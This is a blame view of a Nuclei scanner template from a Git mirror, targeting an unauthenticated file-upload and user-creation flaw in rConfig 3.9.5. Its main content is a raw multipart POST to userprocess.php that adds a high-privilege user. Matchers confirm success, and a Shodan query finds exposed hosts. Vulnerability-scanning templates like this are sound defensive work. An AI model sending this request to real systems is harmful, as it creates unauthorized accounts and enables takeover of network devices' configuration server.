daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/other/rconfig-file-upload.yaml

73 lines
2.2 KiB
YAML
Raw Normal View History

Update rconfig-file-upload.yaml
2023-08-31 19:22:01 +00:00
id: rconfig-file-upload
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
info:
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements
2022-10-10 19:22:59 +00:00
name: rConfig 3.9.5 - Arbitrary File Upload
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
author: dwisiswant0
severity: high
Update rconfig-file-upload.yaml
2023-08-31 19:22:01 +00:00
description: |
rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements
2022-10-10 19:22:59 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
templateman update
2023-10-14 11:27:55 +00:00
verified: true
Added max request counter of each template
2023-04-28 08:11:21 +00:00
max-request: 1
tags and metadata added
2023-09-01 02:53:59 +00:00
shodan-query: title:"rConfig"
templateman update
2023-10-14 11:27:55 +00:00
tags: rconfig,rce,edb,file-upload,instrusive,intrusive
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
removed extra headers not required for template
2021-09-08 12:17:19 +00:00
Cookie: PHPSESSID={{randstr}}
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="username"
removed extra headers not required for template
2021-09-08 12:17:19 +00:00
{{randstr}}
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="passconf"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="password"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
misc fixes
2021-10-06 23:53:20 +00:00
test@{{randstr}}.tld
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
matchers-condition: and
matchers:
- type: word
words:
removed extra headers not required for template
2021-09-08 12:17:19 +00:00
- "User {{randstr}} successfully added to Database"
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
part: body
templateman update
2023-10-14 11:27:55 +00:00
:fire: Add rConfig RCE
2020-10-15 17:26:11 +00:00
- type: status
status:
- 302
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot:
2023-10-20 11:41:13 +00:00
# digest: 4b0a004830460221008bbd9d88d15bfafc6ed8520574a7f28539fc06d5589c544dfb136852b26f516d022100c04f322f1b2062b949b5a7dfa56dbb53c441d424302efbabb8523d4cc8d0fdad:922c64590222798bb761d5b6d8e72950